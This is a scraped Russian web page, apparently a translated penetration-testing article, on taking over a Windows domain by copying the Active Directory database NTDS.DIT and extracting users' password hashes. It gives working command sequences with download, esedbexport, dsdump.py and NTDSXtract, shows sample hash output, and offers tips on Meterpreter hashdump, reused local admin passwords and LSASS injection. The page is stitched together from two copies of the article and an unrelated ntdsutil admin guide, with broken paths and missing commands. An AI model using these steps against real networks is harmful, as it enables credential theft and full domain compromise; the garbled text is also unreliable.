Ntds dit где находится

Ntds dit где находится

В предыдущей статье из серии, я в общих словах объяснил, что такое Менеджер безопасности учетных записей (SAM) Windows, и как, получив физический или удаленный доступ к системе достать из SAM хешированные пароли локальных пользователей.

Подводим итоги по менеджеру учетных записей безопасности

В предыдущей статье из серии, я в общих словах объяснил, что такое Менеджер безопасности учетных записей (SAM) Windows, и как, получив физический или удаленный доступ к системе достать из SAM хешированные пароли локальных пользователей. При удаленном доступе существует три возможных метода получения хешей: метод, основанный на унаследованных возможностях Windows, на теневом копировании томов, и на внедрении в память процесса. Наконец, я сделал сводную электронную таблицу с описанием наиболее часто используемых утилит для дампа хешей из памяти процесса. О некоторых утилитах из этой таблице речь пойдет ниже.

И опять же я хочу повторить следующую мысль: если есть возможность перемещать файлы между вашей машиной и целевой системой, то всегда сначала копируйте файлы SAM и SYSTEM с целевой системы, а затем уже доставайте хеши паролей в оффлайн-режиме.

Тем не менее, простое копирование файлов не гарантирует, что вы получите хеши всех локальных учетных записей. Если все хеши вам получить так и не удалось, то придется слить их из памяти и объединить результаты. Странно, но с подобными случаями я сталкивался не раз, и, хочу подчеркнуть, что речь идет об автономных (не входящих в домен) рабочих станциях Windows.

Рекомендуемые инструменты

Когда на целевой системе мне удалось запустить Metasploit Meterpreter, я пользуюсь пост-эксплойтом smart_hashdump Карлоса Переза (Carlos Perez). Если же smart_hashdump не срабатывает, то я прибегаю к его предыдущей версии – пост-эксплойту hashdump.

Active Directory

Active Directory выступает в роли централизованного хранилища, служащего для управления сетью и безопасностью. В функции службы каталогов входит аутентификация и авторизация всех пользователей внутри домена Windows, создание и выполнение политик безопасности […] Когда пользователь регистрируется в системе на компьютере, входящем в домен, то именно Active Directory проверяет пароль пользователя […]

Информация из определения пригодится вам, после компрометации какой-либо системы из домена Windows. Для того чтобы быстро взять под контроль весь домен, вам нужно получить доступ к корневому контроллеру домена. Если же вы находитесь в домене-потомке, то ваша цель – получить доступ к контроллеру корневого домена леса с правами Администратора предприятия.

В сети существует множество ресурсов, посвященных тому, как повысить свои права в домене, и поэтому в настоящей статье этой темы мы касаться не будем. В блоге pentestmonkey.net приведена вся необходимая информация по вопросу повышения прав.

Также существует вероятность, что администратор использует одни и тот же пароль локального администратора на всех машинах домена. В подобном случае, вам достаточно с помощью keimpx узнать пароль всего на одной машине, и контроллер у вас в руках!

Читайте также:  Hp laserjet 1102s драйвер windows 10

Неважно, каким именно способом вы получили доступ к контроллеру домена (в идеале, подключились к корневому контроллеру домена, так как именно на нем в первую очередь отражаются изменения учетных записей пользователей), самое главное: запустить на контроллере командную строку с правами администратора (локального или доменного).

Файл базы данных NTDS.DIT

Файл NTDS.DIT заблокирован системой. Для получения этого файла вместе с файлом SYSTEM воспользуйтесь службой теневого копирования томов, как описывалось в предыдущей статье.

Как вариант, используйте функцию создания снимка утилитой ntdsutil, впервые такая функция была представлена в Windows Server 2008. Утилита сделает мгновенный снимок базы данных Active Directory, что позволит вам скопировать ntds.dit и файл SYSTEM. О том, как сделать снимок, написано в статье Microsoft TechNet.

Извлечение хешей из NTDS.DIT

Также для извлечения хешей подойдет пакет (ntds_dump_hash.zip), разработанный Ксаба Бартой (Csaba Barta). Функции пакета описаны в статье “Исследование получения хеша паролей в оффлайн-режиме и анализ ntds.dat”. ntds_dump_hash.zip позволяет:

  • извлечь необходимые таблицы из ntds.dit: esedbdumphash
  • получить хеши и дополнительные сведения об учетных записях пользователей: dsdump.py, dsdumphistory.py, dsuserinfo.py.

Скачайте и скомпилируйте пакет:

$ wget http://csababarta.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make

Воспользуйтесь esedbdumphash, чтобы извлечь таблицу datatable из ntds.dit:

$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output
$ ls -1 /tmp/output.export/
datatable

Используйте dsdump.py, чтобы получить хеши из таблицы datatable с помощью bootkey (SYSKEY) из куста SYSTEM:

$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py /tmp/output.export/datatable —include-locked
—include-disabled > domain_hashes.txt

Как и в случае с автономными рабочими станциями, вы точно так же, используя те же методы, можете слить пароли доменных пользователей, внедрившись в память процесса. Но будьте осторожны при манипуляциях с процессом LSASS на контроллере домена: в худшем случае вам придется перезагружать критически важный сервер.

Информацию обо всех описанных в этой статье утилитах я добавил в электронную таблицу.

Изменения на 4 января 2012г.

Скачайте и установите последнюю версию libesedb.

Извлеките таблицы из ntds.dit:

$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit
esedbexport 20111210
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[. ]

С помощью NTDSXtract извлеките из таблицы datatable хешированные пароли и историю паролей:

/NTDSXtract 1.0$ python dsusers.py /tmp/ntds.dit.export/datatable.3
/tmp/ntds.dit.export/link_table.5 —passwordhashes —
passwordhistory —certificates —supplcreds —membership > /tmp/ntds.dit.output

Читайте также:  Ip адрес узнать нахождение компьютера

Используйте этот небольшой скрипт, чтобы преобразовать результаты работы dsusers.py к более привычному виду, подобному тому, который вы увидите после работы pwdump:

$ python ntdstopwdump.py /tmp/ntds.dit.output
Administrator:500:NO
PASSWORD*********************:09b1708f0ea4832b6d87b0ce07d7764b.
Guest:501:NO PASSWORD*********************:NO
PASSWORD*********************.
[. ]

Подписывайтесь на каналы "SecurityLab" в Telegram и Яндекс.Дзен, чтобы первыми узнавать о новостях и эксклюзивных материалах по информационной безопасности.

Файл NTDS.DIT содержит данные Active Directory (AD)для конкретного домена и хранится в каталоге %systemroot%
tds. Размер этого файла может быть достаточно большим. Для увеличения быстродействия AD может потребоваться перемещение файла на другой жесткий диск.

1. Перезагрузите контроллер домена.

2. Нажмите клавишу в загрузочном меню.

3. Выберите команду Восстановление службы каталогов (Directory Services Restore Mode).

4. Выберите необходимую копию операционной системы, если на компьютере установлено более одной системы. После этого зарегистрируйтесь в системе с правами администратора.

5. Откройте интерпретатор командной строки (Пуск > Выполнить > CMD (Start > Run > CMD)).

6. Откройте утилиту NTDSUTIL.EXE.

7. В приглашении утилиты ntdsutil введите команду files, как показано ниже:

8. В приглашении file maintenance введите следующую команду:

file maintenance: move DB to

9. Для просмотра базы данных в меню file maintenance введите команду info.

10. Для проверки целостности базы данных на новом диске в приглашении file maintenance введите команду integrity.

11. Дважды введите команду quit для возврата к основному приглашению командной строки.

12. Перезагрузите компьютер в обычном режиме работы.

Автор: Bernardo Damele A. G

Итоги по SAM

В предыдущей части, говорилось о Менеджере безопасности учетных записей Windows (SAM), и как достать из SAM захешированные пароли локальных учетных записей.

Cуществует три метода получения хешей:

  • через теневое копирование томов
  • через унаследованные возможности Windows
  • внедрение в память процесса.

Советую ознакомится с электронной таблицей в которой описаны наиболее популярные утилиты для получения хешей из памяти процесса.

Если есть возможность копировать файлы между вашим компьютером и целевой станцией, то сначала копируйте файлы SYSTEM и SAM с целевого компьютера, а уже после получайте хеши паролей в оффлайне.

Правда, обычное копирование файлов не гарантирует, получение хешей всех локальных пользователей. Если через файлы не удалось достать хеши всех учеток, то придется получать их из памяти.

Рекомендуемые инструменты

Pwdump7 — работает на 32-x и 64-х битных Windows, начиная с Windows 2000. Правда, pwdump7 не умеет получать хешированные пароли из памяти. Поэтому используйте pwdump7 совместно с gsecdump.

Если на целевом компьютере не удалось воспользоваться Metasploit Meterpreter, попробуйте пост-эксплойт smart_hashdump:

Если и smart_hashdump не заработает, то пробуйте к его предыдущую версию – hashdump:

Active Directory

Active Directory — централизованное хранилище для управления доменной сетью и ее безопасностью. В ее функции входит авторизация и аутентификация пользователей внутри домена Windows, выполнение и создание политик безопасности […] При входе пользователя в ОС на станции, состоящей в домене, именно Active Directory сверяет пароли […]

Читайте также:  Mikrotik ограничение доступа к сайтам

Если необходимо контролировать весь домен, то необходим доступ к корневому доменному контроллеру.

Есть много информации о том, как повысить права в домене, например в блоге pentestmonkey.net есть вся нужная информация о повышении прав.

Есть вероятность, что администратором используется один и тот же пароль локального администратора на всех компьютерах домена. В этом случае, достаточно узнать с помощью keimpx пароль только на одном компьютере, и контроллер домена в ваших руках!

На данном этапе наша цель это запуск консоли с правами администратора на контроллере домена.

Файл базы данных NTDS.DIT

Теперь цель: хешированные пароли пользователей домена. Пароли, как и почти вся информация Active Directory, находится в файле %SystemRoot%
tdsNTDS.DIT. Файл NTDS.DIT заблокирован системой. Для получения файлов NTDS.DIT и SYSTEM используйте службу теневого копирования, как описывалось ранее.

Также, можно воспользоваться функцией создания снимка с помощью утилиты ntdsutil:

впервые такая функция появилась в Windows Server 2008. Ntdsutil сделает снимок базы данных Active Directory, благодаря чему вы сможете получить файлы ntds.dit и SYSTEM. Как сделать снимок читайте в статье Microsoft TechNet:

Получение хешей из NTDS.DIT

Для получения хешей из ntds.dit воспользуйтесь Windows Password Recovery Tool или ntds_dump_hash.zip:

ntds_dump_hash.zip позволит:

  • извлечь нужные таблицы из ntds.dit: esedbdumphash
  • получить хеши и сведения об учетных записях: dsdump.py, dsuserinfo.py, dsdumphistory.py.

Скачайте и скомпилируйте ntds_dump_hash.zip:

$ wget http://www.ntdsxtract.com/downloads/ntds_dump_hash.zip
$ unzip ntds_dump_hash.zip
$ cd libesedb
$ ./configure && make

Воспользуйтесь esedbdumphash, для извлечения таблицы datatable из ntds.dit:

$ cd esedbtools
$ ./esedbdumphash -v -t /tmp/output
$ ls -1 /tmp/output.export/
datatable

С помощью dsdump.py получите хеши из таблицы datatable, через bootkey (SYSKEY) из куста SYSTEM:

$ cd ../../creddump/
$ chmod +x *.py
$ ./dsuserinfo.py /tmp/output.export/datatable
$ ./dsdump.py /tmp/output.export/datatable —include-locked
—include-disabled > domain_hashes.txt

Фреймворк ntdsxtract.com вместе с утилитой libesedb также умеют (корректно работают в 64-bit ОС позволяет извлекать информацию из базы данных ntds.dit.

Установите последнюю версию libesedb.

Извлеките таблицы из ntds.dit:

$ esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit
esedbexport 20111210
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.

$ ls -1 /tmp/ntds.dit.export/
datatable.3
hiddentable.4
link_table.5
[. ]

С помощью фреймворка NTDSXtract извлеките из таблицы datatable захешированные пароли и историю паролей:

Ссылка на основную публикацию
Adblock detector